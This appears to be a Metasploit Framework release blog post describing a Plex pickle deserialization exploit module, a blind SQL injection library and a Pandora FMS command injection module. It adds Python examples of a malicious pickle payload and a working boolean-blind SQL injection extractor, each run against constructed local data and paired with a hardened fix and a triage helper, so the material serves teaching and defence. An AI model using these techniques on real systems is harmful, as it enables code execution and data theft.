Plex unpickling

The exploit/windows/http/plex_unpickle_dict_rce module by h00die exploits an authenticated Python pickle deserialization vulnerability in Plex Media Server. The module creates a photo library and uploads a pickled Dict file containing a Python payload to the library’s path. Code execution is then achieved by triggering the plugin loading functionality, which unpickles the Dict file without any validation of its contents. Because an unpickler reconstructs whatever callables the stream names, an attacker-controlled pickle file is equivalent to arbitrary code execution in the process that loads it.
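As an added illustration of the pattern the module relies on (this is not the module’s code and not Plex code; it is generic Python), the block below shows a pickle whose `__reduce__` names an arbitrary callable, the unsafe load that executes it, a restricted unpickler that refuses unknown globals, and a static triage helper that lists the globals a pickle stream would import without loading it. `builtins.eval` stands in for `os.system`, the allowlist contents and all function names are assumptions, and the sample payloads are constructed.

```python
import builtins
import io
import pickle
import pickletools


class PickleBomb:
    """Attacker-controlled object. pickle.dumps() records the callable and the
    arguments returned by __reduce__; whoever unpickles the bytes calls them."""

    def __init__(self, expr):
        self.expr = expr

    def __reduce__(self):
        # builtins.eval stands in for os.system/subprocess: the unpickler will
        # import and call any global the stream names, with attacker-chosen args.
        return (builtins.eval, (self.expr,))


def build_payload(expr="7 * 6"):
    """Constructed: bytes an attacker would drop into the on-disk pickle file."""
    return pickle.dumps(PickleBomb(expr))


def benign_payload():
    """Constructed: what legitimate plugin state looks like (plain containers)."""
    return pickle.dumps({"last_scan": 1598000000, "items": ["a", "b"]})


def unsafe_load(data):
    """The vulnerable pattern: trusting on-disk pickle data as-is."""
    return pickle.loads(data)


# Allowlist of (module, name) pairs the hardened loader may resolve. Assumption:
# a real application lists exactly the types its saved state legitimately uses.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened form: find_class() is the only hook through which a stream can
    reach a callable, so refusing unknown globals there blocks the attack."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True when the restricted loader refuses the stream."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def referenced_globals(data):
    """Static triage, nothing is executed: list the module.name pairs a stream
    would import. Handles GLOBAL (protocol <= 3, arg is "module name") and
    STACK_GLOBAL (protocol >= 4, which takes module and name from the two
    preceding string pushes). Heuristic only: a stream that re-uses memoized
    strings via *GET opcodes is not resolved here, so treat an empty result as
    "unknown", not "clean"."""
    found = []
    strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
    return found


if __name__ == "__main__":
    payload = build_payload()
    print("globals referenced:", referenced_globals(payload))
    print("unsafe_load ->", unsafe_load(payload))
    print("safe_load rejects it:", is_rejected(payload))
    print("safe_load accepts benign state:", not is_rejected(benign_payload()))
```

The point of `referenced_globals` is forensic: a pickle that a media server wrote for its own plugin state has no reason to name `builtins.eval`, `os.system` or `subprocess.Popen`, so listing the globals of a suspicious Dict file is a safe first check before anyone loads it. The restricted unpickler is the only real fix for code that must keep reading pickle from a writable location; validating file names or extensions does nothing, since the file contents are what carry the callable.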

SQLi library

Through GSoC, Niboucha Redouane has added a SQL injection library with MySQL support to Framework. The library helps exploit boolean-based and time-based blind injections, offering helpers that perform the common queries so that module authors do not need to hand-roll them. The auxiliary/sqli/openemr/openemr_sqli_dump and exploit/linux/http/eyesofnetwork_autodiscovery_rce modules have been updated to use it and show the library in action.
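As an added example of the search a boolean-blind helper has to perform (this is not the Framework library’s code or API), the block below runs it in Python against a constructed in-memory SQLite database standing in for the target’s MySQL backend; SQLite’s `length()`, `substr()` and `unicode()` play the role of MySQL’s `LENGTH()`, `SUBSTRING()` and `ASCII()`. The table, the row, the vulnerable lookup and all function names are assumptions. A time-based variant replaces the row-present/absent oracle with a response-latency one and keeps the same search.

```python
import sqlite3


def build_db():
    """Constructed sample database standing in for the target's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users (name, password) VALUES ('admin', 's3cr3t!')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, name):
    """Deliberately vulnerable: the parameter is concatenated into the statement.
    The caller only learns whether a row matched, which is the boolean side
    channel a blind injection works with."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def safe_lookup(conn, name):
    """Hardened form: a bound parameter, so quotes and comments are just data."""
    sql = "SELECT id FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


class BooleanOracle:
    """Turns the vulnerable endpoint into a yes/no oracle for an injected condition."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0  # request count, the cost a blind helper must minimise

    def ask(self, condition):
        self.queries += 1
        # 'admin' is a known-good value, so the only variable is the condition.
        payload = "admin' AND (" + condition + ") -- "
        return vulnerable_lookup(self.conn, payload)


def bisect_value(ask_gt, lo, hi):
    """Binary search for an integer v in [lo, hi] given an oracle for 'v > x'.
    Costs ceil(log2(hi - lo + 1)) queries instead of up to hi - lo."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask_gt(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery`: first its length, then each
    character's code point, every step through the yes/no oracle only."""
    length = bisect_value(
        lambda v: oracle.ask(f"length(({subquery})) > {v}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = bisect_value(
            lambda v, p=pos: oracle.ask(f"unicode(substr(({subquery}), {p}, 1)) > {v}"),
            0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    oracle = BooleanOracle(build_db())
    secret = extract(oracle, "SELECT password FROM users WHERE name = 'admin'")
    print(f"recovered {secret!r} in {oracle.queries} queries")
    # The parameterised query is immune to the same input:
    print("safe_lookup with injection ->", safe_lookup(oracle.conn, "admin' OR 1=1 -- "))
```

Recovering a seven-character value takes about 55 requests with the bisection above, versus several hundred with a linear scan over the printable range; that request budget is what makes a blind injection practical, and it is the part a shared library should get right once. The `-- ` terminator and the `unicode()`/`substr()` spellings are SQLite’s; against MySQL the library’s helpers would emit the MySQL equivalents.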

Pandora FMS Events RCE

Erik Wynter added a new exploit module for several versions of the Pandora FMS network monitoring software. The module exploits a command injection vulnerability in Pandora’s events functionality: remote code execution is achieved by sending a POST request with the payload in the target parameter. Exploitation requires valid credentials for at least a low-privileged user account.

New modules (2)

Enhancements and features

  • PR #13626 by bcoles adds several improvements to the post/windows/gather/checkvm module: the module’s line count has been reduced by approximately 30%, and its execution time has been shortened by ensuring that the registry_enumkeys() and session.sys.process.get_processes() methods are each called only once.
  • PR #13750 by h00die consolidates the modules within the /cisco, /juniper, /ubiquiti, and /brocade folders into the /networking folder. This PR also improves code style and the documentation for the modules.
  • PR #13759 by antoinet adds the BaselineAuthTime advanced option to the auxiliary/scanner/http/owa_login module. This option allows the user to define the expected authentication response time in order to better differentiate between valid and invalid credentials.
  • PR #13841 by bcoles adds the is_root?() method to the Msf::Post::Unix mixin and updates FreeBSD and OpenBSD local exploit modules to use the new method.
  • PR #13848 by 0x44434241 adds the telnet_cdata_ftth_backdoor_userpass.txt wordlist, which contains admin credentials found hard-coded in CDATA OLT devices.
  • PR #13596 by Niboucha Redouane adds a new SQLi library and updates the auxiliary/sqli/openemr/openemr_sqli_dump and exploit/linux/http/eyesofnetwork_autodiscovery_rce modules to use the new library functionality.

Bugs fixed

  • PR #13271 by h00die fixes a timeout error in auxiliary/server/capture/smtp by implementing logic to handle RSET commands. Additionally, the module can now store AUTH LOGIN, CRAM-MD5, and PLAIN credentials in the database.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).